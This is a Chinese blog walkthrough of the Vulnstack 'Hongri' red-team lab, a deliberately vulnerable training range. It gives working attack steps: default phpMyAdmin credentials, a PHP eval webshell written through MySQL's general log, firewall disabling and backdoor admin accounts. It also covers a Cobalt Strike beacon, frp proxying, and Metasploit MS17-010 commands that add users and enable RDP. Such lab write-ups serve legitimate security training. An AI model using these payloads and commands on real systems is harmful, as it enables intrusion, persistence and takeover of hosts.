红日靶场（一）仅参考

标签：红日 set 参考 主机 端口 add COMMAND 靶场 内网

红日靶场（一）地址：http://vulnstack.qiyuanxuetang.net/vuln/detail/2/

描述

 

红队实战系列，主要以真实企业环境为实例搭建一系列靶场，通过练习、视频教程、博客三位一体学习。另外本次实战完全模拟ATT&CK攻击链路进行搭建，开成完整闭环。后续也会搭建真实APT实战环境，从实战中成长。关于环境可以模拟出各种各样实战路线，目前给出作者实战的一套攻击实战路线如下，虚拟机所有统一密码：hongrisec@2019

一、环境搭建
1.环境搭建测试
2.信息收集

二、漏洞利用
3.漏洞搜索与利用
4.后台Getshell上传技巧
5.系统信息收集
6.主机密码收集

三、内网搜集
7.内网--继续信息收集
8.内网攻击姿势--信息泄露
9.内网攻击姿势-MS08-067
10.内网攻击姿势-SMB远程桌面口令猜测
11.内网攻击姿势-Oracle数据库TNS服务漏洞
12.内网攻击姿势-RPC DCOM服务漏洞

四、横向移动
13.内网其它主机端口-文件读取
14.内网其它主机端口-redis
15.内网其它主机端口-redis Getshell
16.内网其它主机端口-MySQL数据库
17.内网其它主机端口-MySQL提权

五、构建通道
18.内网其它主机端口-代理转发

六、持久控制
19.域渗透-域成员信息收集
20.域渗透-基础服务弱口令探测及深度利用之powershell
21.域渗透-横向移动[wmi利用]
22.域渗透-C2命令执行
23.域渗透-利用DomainFronting实现对beacon的深度隐藏
24.域渗透-域控实现与利用

七、痕迹清理
25、日志清理

 

一：搭建环境

下载好靶机

双击vmx打开虚拟机（配置文件）

 win7新建网卡

 把所有靶机启动环境即可搭建成功

二：信息收集

win7两个网卡

 

探测内网存活

netdiscover -i eth0 -r 192.168.1.0/24

-i 指定网卡
-r 指定网段

 

 对目标IP进行端口扫描

使用nmap进行端口扫描

┌──(root㉿kali)-[~]
└─# nmap -sS -v 192.168.1.12 --min-hostgroup 254 --min-rate 1000  

ps：-sS 使用半开扫描

--min-hostgroup 254 --min-rate 1000  加快扫描速度

 扫描结果得知开放了80，445，3306等端口

 访问80端口

是一个phpstudy探针页面
可以看到 服务器信息 网站路径

 

对WEB目录进行爆破

dirb http://192.168.1.12

 

 

 扫出后台管理地址

 

二、漏洞利用

弱密码登录

尝试使用phpmyadmin默认密码root/root 登录成功

 

3.漏洞搜索与利用

通过目录存在源码泄露

 

 

 

phpmyadmin漏洞利用

查看否可以写入文件

mysql   into写入文件：使用需看要secure_file_priv的值。
    value为“null”时，不允许读取任意文件
    value为其余路径时，表示该路径可以读写文件
    value为“空”时，允许读取任意文件

show global variables like '%secure%' 
命令查看

 为NULL不可写入文件
要想修改 Value值 只能通过配置文件 mysql.ini 修改

后台Getshell上传技巧

尝试用日志写入木马getshell

开启mysql日志功能：

 1 　　 查看日志功能是否开启
 2     show global variables like '%general%'
 3     未开启的话设置为 on
 4     set global general_log='ON'
 5     开启后将日志文件的存储位置改为可访问到的目录， 根目录即可
 6     set global  general_log_file = 'C:/phpStudy/WWW/lusuo.php'
 7     执行下边一句话木马 
 8     数据库将会将查询语句保存在日志文件中
 9     SELECT '<?php @eval($_POST["lusuo"]); ?>'
10     写入成功后 使用菜刀，冰蝎等连接

 写入一句话木马

 

 使用菜刀进行连接

关闭防火墙

netsh advfirewall show allprofile state     （显示防火墙）


netsh advfirewall set allprofiles state off    （关闭防火墙）

 添加用户及加入管理员组

net user 账户 密码 /add
管理员权限，所有直接加
net localgroup administrators admin /add

 

 系统信息收集

 

whomai  (查看权限)

ipconfig /all 

systeminfo  （列出系统信息）

 

 

 上线CS

使用cs生成后门在菜刀上传后虚拟终端运行

 右键上传文件

 终端执行后上线

 

 6.主机密码收集

 

进行内网端口扫描

 

 内网存在3台主机

搭建代理

配置客户端frp

 上传到目标主机

 

 

启动服务

frps.exe -c frps.ini

 菜刀终端启动frp客户端

 

配置kali proxychain代理

 测试代理

 使用代理启动msf

proxychains msfconsole

 

搜索ms17010漏洞相关的payload
 search ms17

# 加载检测payload
use auxiliary/scanner/smb/smb_ms17_010
 # 查看需要输入的参数
show options
# 设置检测的目标ip地址
set RHOST 192.168.1.141 # 开启检测
exploit

 存在永恒之蓝漏洞

进行漏洞利用

search ms17

# 使用命令执行的pyload

use auxiliary/admin/smb/ms17_010_command

 

设置检测的目标ip地址

set rhost192.168.52.141

设置需要执行的命令

set COMMAND whoami

　

 

# 添加一个用户
## **如果登录失败要在用户前面加上域 god\lusuo345** 

set COMMAND net user lusuo345 Admin@123 /add
set COMMAND net localgroup administrators lusuo345 /add 
# 查看3389的开启状态
set COMMAND "reg query
\"HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Control\Terminal Server\" /v fDenyTSConnections"
# 启用RDP
set COMMAND "reg add
\"HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Control\Terminal Server\" /v fDenyTSConnections /t REG_DWORD /d 0 /f"
# 查看RDP使用的端口
set COMMAND "reg query
\"HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Control\Terminal Server\WinStations\RDP-Tcp\" /v PortNumber"
# 同样的操作注册表开启RDP服务 set COMMAND "reg add
\"HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Control\Terminal Server\" /v fDenyTSConnections /t REG_DWORD /d 0 /f"
# 关闭⽹络级别的⾝份验证（通常默认关闭） set COMMAND "reg add
\"HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Control\Terminal
Server\WinStations\RDP-Tcp\" /v UserAuthentication /t REG_DWORD /d 0 /f" # 防⽕墙放通3389或者其他RDP端⼝
set COMMAND "netsh advfirewall firewall add rule name=\"Remote Desktop\" dir=in action=allow protocol=TCP localport=3389"

 添加用户加入管理员组

 

 

 

 

开启3389端口

 

启用RDP
set COMMAND "reg add
\"HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Control\Terminal Server\" /v fDenyTSConnections /t REG_DWORD /d 0 /f"

 通过代理远程连接连接

 

 

  TRANSLATE with x English

Arabic	Hebrew	Polish
Bulgarian	Hindi	Portuguese
Catalan	Hmong Daw	Romanian
Chinese Simplified	Hungarian	Russian
Chinese Traditional	Indonesian	Slovak
Czech	Italian	Slovenian
Danish	Japanese	Spanish
Dutch	Klingon	Swedish
English	Korean	Thai
Estonian	Latvian	Turkish
Finnish	Lithuanian	Ukrainian
French	Malay	Urdu
German	Maltese	Vietnamese
Greek	Norwegian	Welsh
Haitian Creole	Persian

  TRANSLATE with COPY THE URL BELOW Back EMBED THE SNIPPET BELOW IN YOUR SITE Enable collaborative features and customize widget: Bing Webmaster Portal Back     此页面的语言为中文（简体）   翻译为        

• 中文（简体）
• 中文（繁体）
• 丹麦语
• 乌克兰语
• 乌尔都语
• 亚美尼亚语
• 俄语
• 保加利亚语
• 克罗地亚语
• 冰岛语
• 加泰罗尼亚语
• 匈牙利语
• 卡纳达语
• 印地语
• 印尼语
• 古吉拉特语
• 哈萨克语
• 土耳其语
• 威尔士语
• 孟加拉语
• 尼泊尔语
• 布尔语(南非荷兰语)
• 希伯来语
• 希腊语
• 库尔德语
• 德语
• 意大利语
• 拉脱维亚语
• 挪威语
• 捷克语
• 斯洛伐克语
• 斯洛文尼亚语
• 旁遮普语
• 日语
• 普什图语
• 毛利语
• 法语
• 波兰语
• 波斯语
• 泰卢固语
• 泰米尔语
• 泰语
• 海地克里奥尔语
• 爱沙尼亚语
• 瑞典语
• 立陶宛语
• 缅甸语
• 罗马尼亚语
• 老挝语
• 芬兰语
• 英语
• 荷兰语
• 萨摩亚语
• 葡萄牙语
• 西班牙语
• 越南语
• 阿塞拜疆语
• 阿姆哈拉语
• 阿尔巴尼亚语
• 阿拉伯语
• 韩语
• 马尔加什语
• 马拉地语
• 马拉雅拉姆语
• 马来语
• 马耳他语
• 高棉语

  随时将中文（简体）翻译为PRO
一律不翻译中文（简体）
一律不翻译i.cnblogs.com

标签：红日,set,参考,主机,端口,add,COMMAND,靶场,内网
From： https://www.cnblogs.com/lusuo/p/17523049.html